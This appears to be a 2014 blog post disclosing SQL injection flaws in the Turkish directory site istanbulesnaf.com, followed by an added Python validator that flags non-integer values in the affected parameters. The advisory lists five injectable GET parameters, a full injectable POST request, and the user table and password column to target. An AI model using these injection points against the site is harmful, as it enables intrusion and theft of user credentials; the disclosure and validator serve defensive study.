Saturday, 8 February 2014

IstanbulEsnaf.com Esnaf Rehberi POST&SQL Injection Vulnz

Bug Type : Post&Normal SQL Injection
Vulnerable Files : -
----------------------
Normal SQL Injections;
?@=Firmam&ID=1'{1nj3ct10n)
?@=FirmaGruplar&Sektor=1'{1nj3ct10n)
?@=SeriIlanlarim&grup=1'{1nj3ct10n)
?@=Bilgim&ID=1'{1nj3ct10n)
?@=Bilgi&x=1'{1nj3ct10n)
-------------------------------
Post SQL Injection ;
http://istanbulesnaf.com/?@=FirmaKaydet
Host: istanbulesnaf.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://istanbulesnaf.com/?@=FirmaEkleyin&s=13
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

sektorum=13[INJECTABLE]&sektor=%3F%40%3DFirmaEkleyin%26s%3D13&grup=24[INJECTABLE]

Important table and column names:
Table Name : KULLANICILAR
Column Names : mail,sifre,kullanicie http://activeation.com/AMoV
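
A defender-side check for the parameters listed above, as an added example that is not part of the original advisory: it flags requests in which a listed parameter is not a plain integer, for server-side validation or for triaging logged requests. It assumes these parameters carry integer IDs (the advisory only shows values such as 1, 13 and 24); the function name and the sample requests are constructed.

```python
from urllib.parse import urlsplit, parse_qs

# Route (value of the "@" parameter) -> parameters the advisory lists as injectable.
# Assumption: each of these is an integer ID, as the values 1, 13 and 24 suggest.
NUMERIC_PARAMS = {
    "Firmam": {"ID"},
    "FirmaGruplar": {"Sektor"},
    "SeriIlanlarim": {"grup"},
    "Bilgim": {"ID"},
    "Bilgi": {"x"},
    "FirmaKaydet": {"sektorum", "grup"},  # sent in the POST body
}


def violations(url, body=""):
    """Return (param, value) pairs whose value is not a plain ASCII integer.

    url  -- request target, e.g. "/?@=Firmam&ID=7"
    body -- urlencoded POST body, empty for GET requests
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True)
    route = query.get("@", [""])[0]
    bad = []
    for name in sorted(NUMERIC_PARAMS.get(route, ())):
        # A parameter may arrive in the query string, the body, or both.
        for value in query.get(name, []) + form.get(name, []):
            if not (value.isascii() and value.isdigit()):
                bad.append((name, value))
    return bad


if __name__ == "__main__":
    # Constructed sample requests (target, body); not taken from real traffic.
    samples = [
        ("/?@=Firmam&ID=7", ""),
        ("/?@=Firmam&ID=7'", ""),
        ("/?@=FirmaKaydet",
         "sektorum=13&sektor=%3F%40%3DFirmaEkleyin%26s%3D13&grup=24"),
        ("/?@=FirmaKaydet", "sektorum=13'&grup=24"),
    ]
    for target, body in samples:
        hits = violations(target, body)
        print("REJECT" if hits else "ok    ", target, hits)
```

Rejecting non-integer values narrows the exposure, but the fix in the application itself is to bind these values as parameters in the SQL statements instead of concatenating them.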
